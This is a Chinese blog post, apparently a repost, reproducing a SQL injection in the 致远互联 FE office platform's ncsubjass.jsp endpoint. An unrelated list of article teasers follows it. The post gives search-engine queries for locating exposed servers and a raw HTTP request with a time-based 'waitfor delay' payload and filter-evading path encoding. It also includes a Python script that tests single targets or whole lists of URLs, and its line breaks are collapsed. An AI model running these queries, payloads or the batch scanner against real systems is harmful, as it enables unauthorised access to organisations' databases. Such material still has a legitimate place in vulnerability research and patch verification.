【漏洞复现】致远互联FE协作办公平台——SQL注入

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

  • 漏洞描述
  • 漏洞复现
  • 测试工具

漏洞描述

致远互联FE协作办公平台是一个专注于协同管理软件领域的数智化运营平台及云服务提供商。其ncsubjass.jsp接口处存在SQL注入漏洞,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句。

漏洞复现

1)信息收集
fofa:body="li_plugins_download"
hunter:web.body="li_plugins_download"
在这里插入图片描述
哲学家们只是用不同的方式解释世界,而问题在于改变世界。
在这里插入图片描述
2)构造数据包

POST /fenc/ncsubjass.j%73p HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36subjcode=-1';waitfor delay '0:0:5'--

在这里插入图片描述
响应包延迟了5秒,验证存在sql注入。

测试工具

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import http.client  # 导入处理HTTP请求的模块
import ssl          # 导入SSL支持模块
import argparse     # 导入命令行参数解析模块
from urllib.parse import urlparse  # 导入URL解析模块
import time         # 导入时间处理模块# 定义控制台输出颜色代码
RED = '\033[91m'   # 红色
RESET = '\033[0m'  # 重置颜色def check_vulnerability(url):"""检查给定URL是否存在特定的SQL注入漏洞。"""try:# 解析URL,获取域名和协议parsed_url = urlparse(url)# 设置请求的路径和数据体path = "/fenc/ncsubjass.j%73p"  # 要请求的路径,其中j%73p为编码后的".js"# 构造POST请求的数据体,包含潜在的SQL注入payloadbody = "subjcode=-1';waitfor delay '0:0:3'--"headers = {"Content-Type": "application/x-www-form-urlencoded",  # 设置Content-Type头"User-Agent": "Mozilla/5.0"  # 设置User-Agent头}# 根据URL的协议创建连接对象,如果是HTTPS则忽略证书验证conn = http.client.HTTPSConnection(parsed_url.netloc, context=ssl._create_unverified_context()) if parsed_url.scheme == "https" else http.client.HTTPConnection(parsed_url.netloc)# 记录开始时间start_time = time.time()# 发送POST请求conn.request("POST", path, body=body, headers=headers)# 获取服务器响应response = conn.getresponse()# 计算请求耗时elapsed_time = time.time() - start_time# 如果响应时间在3到5秒之间,可能表明存在SQL注入漏洞(因为waitfor delay '0:0:3'会延迟响应)if 3 <= elapsed_time <= 5:print(f"{RED}URL [{url}] 可能存在致远互联FE协作办公平台 ncsubjass SQL注入漏洞{RESET}")else:print(f"URL [{url}] 不存在漏洞")except Exception as e:# 如果请求失败,打印错误信息print(f"URL [{url}] 请求失败: {e}")def main():"""主函数,解析命令行参数并调用漏洞检查函数。"""# 创建命令行参数解析器parser = argparse.ArgumentParser(description='检测目标地址是否存在致远互联FE协作办公平台 ncsubjass SQL注入漏洞')# 添加命令行参数选项parser.add_argument('-u', '--url', help='指定目标地址')parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')# 解析命令行参数args = parser.parse_args()# 如果指定了单个URL,进行漏洞检查if args.url:# 确保URL格式正确if not args.url.startswith("http://") and not args.url.startswith("https://"):args.url = "http://" + args.urlcheck_vulnerability(args.url)# 如果指定了包含多个URL的文件,逐个读取并进行漏洞检查elif args.file:with open(args.file, 'r') as file:urls = file.read().splitlines()  # 读取所有行并去除换行符for url in urls:# 确保URL格式正确if not url.startswith("http://") and not url.startswith("https://"):url = "http://" + urlcheck_vulnerability(url)# 当作为主程序运行时,调用main函数
if __name__ == '__main__':main()

运行截图
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/37337.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

关于内存和外存文件不同字符集下占用空间大小问题

关于内存和外存文件不同字符集下占用空间大小问题

关于内存和外存不同字符集下文件占用空间大小问题 存储&#xff08;外存&#xff09;的文件中的字符&#xff1a; ASCII&#xff1a;每个字符占用1个字节&#xff0c;用来存储英文字符和常用标点符号。ISO-8859-1&#xff1a;每个字符占用1个字节&#xff0c;向下兼容ASCII。G…
阅读更多...
DS18B20单总线数字温度传感器国产替代MY18E20 MY1820 MY18B20Z MY18B20L(一)

DS18B20单总线数字温度传感器国产替代MY18E20 MY1820 MY18B20Z MY18B20L(一)

前言 DS18B20是全球第一个单总线数字温度传感器&#xff0c;推出时间已经超过30年&#xff0c;最早由美国达拉斯半导体公司推出&#xff0c;2001年1月&#xff0c;美信以25亿美元收购达拉斯半导体&#xff08;Dallas Semiconductor&#xff09;&#xff0c;而美信在2021年8月被…
阅读更多...
DM达梦数据库存储过程

DM达梦数据库存储过程

&#x1f49d;&#x1f49d;&#x1f49d;首先&#xff0c;欢迎各位来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里不仅可以有所收获&#xff0c;同时也能感受到一份轻松欢乐的氛围&#xff0c;祝你生活愉快&#xff01; &#x1f49d;&#x1f49…
阅读更多...
RDMA通信2:RDMA基本元素和组成 通信过程元素关系解析 视频教程

RDMA通信2:RDMA基本元素和组成 通信过程元素关系解析 视频教程

哈哈哈&#xff0c;今天我们把下面这张图理解了&#xff0c;我们的任务就完成了&#xff01; 视频教程在这&#xff1a;1.2 RDMA基本元素和组成 通信过程元素关系解析_哔哩哔哩_bilibili 一、WQ和WQE 工作队列元素(work queue element,WQE)&#xff1a;是软件下发给硬件的任务…
阅读更多...
Apache Ranger 2.4.0 集成Hive 3.x(Kerbos)

Apache Ranger 2.4.0 集成Hive 3.x(Kerbos)

一、解压tar包 tar zxvf ranger-2.4.0-hive-plugin.tar.gz 二、修改install.propertis POLICY_MGR_URLhttp://localhost:6080REPOSITORY_NAMEhive_repoCOMPONENT_INSTALL_DIR_NAME/BigData/run/hiveCUSTOM_USERhadoop 三、进行enable [roottv3-hadoop-01 ranger-2.4.0-hive…
阅读更多...
什么是TOGAF架构框架的ADM方法?

什么是TOGAF架构框架的ADM方法?

ADM是架构开发方法&#xff08; Architecture Development Method&#xff09;&#xff0c;为开发企业架构所要执行的各个步骤以及它们质检的关系进行详细的定义&#xff0c;它是TOGAF规范中最为核心的内容。 ADM的具体步骤&#xff1a; 预备阶段&#xff08;Preliminary Phas…
阅读更多...
STM32第十三课:DMA多通道采集光照烟雾

STM32第十三课:DMA多通道采集光照烟雾

文章目录 需求一、DMA&#xff08;直接存储器存取&#xff09;二、实现流程1.时钟使能2.设置外设寄存器地址3.设置存储器地址4.设置要传输的数据量5.设置通道优先级6.设置传输方向7.使通道和ADC转换 三、数据处理四、需求实现总结 需求 通过DMA实现光照强度和烟雾浓度的多通道…
阅读更多...
【SkiaSharp绘图13】SKCanvas方法详解(二)填充颜色、封装对象、高性能绘制、点(集)(多段)线、圆角矩形、Surface、沿路径绘制文字

【SkiaSharp绘图13】SKCanvas方法详解(二)填充颜色、封装对象、高性能绘制、点(集)(多段)线、圆角矩形、Surface、沿路径绘制文字

文章目录 SKCanvas方法DrawColor 填充颜色DrawDrawable 绘制封装对象DrawImage 高性能绘制图像SKBitmap与SKImage对比DrawPicture 绘制图像SKPicture DrawPoint / DrawPoints 绘制点DrawRoundRect/DrawRoundRectDifference绘制圆角矩形DrawSurface 绘制SurfaceDrawTextOnPath沿…
阅读更多...
List接口, ArrayList Vector LinkedList

List接口, ArrayList Vector LinkedList

Collection接口的子接口 子类Vector&#xff0c;ArrayList&#xff0c;LinkedList 1.元素的添加顺序和取出顺序一致&#xff0c;且可重复 2.每个元素都有其对应的顺序索引 方法 在index 1 的位置插入一个对象&#xff0c;list.add(1,list2)获取指定index位置的元素&#…
阅读更多...
sheng的学习笔记-AI-聚类(Clustering)

sheng的学习笔记-AI-聚类(Clustering)

ai目录 sheng的学习笔记-AI目录-CSDN博客 基础知识 什么是聚类 在“无监督学习”(unsupervised learning)中&#xff0c;训练样本的标记信息是未知的&#xff0c;目标是通过对无标记训练样本的学习来揭示数据的内在性质及规律&#xff0c;为进一步的数据分析提供基础。此类学…
阅读更多...
Android跨进程通信,binder传输数据过大导致客户端APP,Crash,异常捕获,监听异常的数值临界值,提前Hook拦截。

Android跨进程通信,binder传输数据过大导致客户端APP,Crash,异常捕获,监听异常的数值临界值,提前Hook拦截。

文章目录 Android跨进程通信&#xff0c;binder传输数据过大导致Crash&#xff0c;异常捕获&#xff0c;监听异常的数值临界值&#xff0c;提前Hook拦截。1.binder在做跨进程传输时&#xff0c;最大可以携带多少数据1.1有时候这个1m的崩溃系统捕获不到异常&#xff0c; 2.监测异…
阅读更多...
志愿填报指南:为什么我强烈建议你报考计算机专业

志愿填报指南:为什么我强烈建议你报考计算机专业

首先恭喜2024届高考的同学们&#xff0c;你们已经通过了高考的考验&#xff0c;即将进入人生的新阶段——大学。 现在正是高考完填报志愿的时刻&#xff0c;Left听到身边朋友提到报考志愿的诸多问题&#xff1a; 志愿填报怎么填&#xff1f;我要报考什么专业&#xff1f;这个…
阅读更多...
[Cloud Networking] OSPF

[Cloud Networking] OSPF

OSPF 开放式最短路径优先&#xff08;Open Shortest Path First&#xff09;是一种动态路由协议&#xff0c;它属于链路状态路由协议&#xff0c;具有路由变化收敛速度快、无路由环路、支持变长子网掩码和汇总、层次区域划分等优点。 1 OSPF Area 为了适应大型网络&#xff0…
阅读更多...
可编程定时计数器8253/8254 - 8253入门

可编程定时计数器8253/8254 - 8253入门

时钟-给设备打拍子 概述 在计算机系统中&#xff0c;为了使所有设备之间的通信井然有序&#xff0c;各通信设备间必须有统一的节奏&#xff0c;不能各干各的&#xff0c;这个节奏就被称为定时或时钟 时钟并不是计算机处理速度的衡量&#xff0c;而是一种使设备间相互配合而避…
阅读更多...
Linux 磁盘挂载与分区

Linux 磁盘挂载与分区

Linux 磁盘挂载与分区 vda1: 其中vd表示虚拟磁盘&#xff0c;a表示第一块磁盘&#xff0c;b表示第二块磁盘&#xff0c;1表示第一块磁盘的第一分区&#xff08;显然两块磁盘都只有一个分区&#xff09;图中可以看到&#xff0c;vda1磁盘只有一个分区&#xff0c;且全部挂载到根…
阅读更多...
vue3使用vant4的列表vant-list点击进入详情自动滚动到对应位置,踩坑日记(一天半的踩坑经历)

vue3使用vant4的列表vant-list点击进入详情自动滚动到对应位置,踩坑日记(一天半的踩坑经历)

1.路由添加keepAlive <!-- Vue3缓存组件&#xff0c;写法和Vue2不一样--><router-view v-slot"{ Component }"><keep-alive><component :is"Component" v-if"$route.meta.keepAlive"/></keep-alive><component…
阅读更多...
如何在MySQL中按字符串中的数字排序

如何在MySQL中按字符串中的数字排序

在管理数据库时&#xff0c;我们经常遇到需要按嵌入在字符串中的数字进行排序的情况。这在实际应用中尤为常见&#xff0c;比如文件名、代码版本号等字段中通常包含数字&#xff0c;而这些数字往往是排序的关键。本文将详细介绍如何在MySQL中利用正则表达式提取字符串中的数字并…
阅读更多...
Java家教系统小程序APP公众号h5源码

Java家教系统小程序APP公众号h5源码

让学习更高效&#xff0c;更便捷 &#x1f31f; 引言&#xff1a;家教新选择&#xff0c;小程序来助力 在快节奏的现代生活中&#xff0c;家长们越来越注重孩子的教育问题。然而&#xff0c;如何为孩子找到一位合适的家教老师&#xff0c;成为了许多家长头疼的问题。现在&…
阅读更多...
谷歌个人号,20人连续封测14天所需设备该怎么解决?

谷歌个人号,20人连续封测14天所需设备该怎么解决?

现在&#xff0c;在Google Play上架应用&#xff0c;对于大部分开发者来说&#xff0c;真的是不小的挑战&#xff0c;因为目前谷歌上架政策越来越严格了。特别是从2023年11月13日起&#xff0c;新政策要求个人开发者账号的应用必须经过20个独立用户连续14天的封闭测试&#xff…
阅读更多...
【C语言】--分支和循环(1)

【C语言】--分支和循环(1)

&#x1f37f;个人主页: 起名字真南 &#x1f9c7;个人专栏:【数据结构初阶】 【C语言】 目录 前言1 if 语句1.1 if1.2 else1.3 嵌套if1.4 悬空else 前言 C语言是结构化的程序设计语言&#xff0c;这里的结构指的是顺序结构、选择结构、循环结构。 我们可以用if、switch实现分支…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023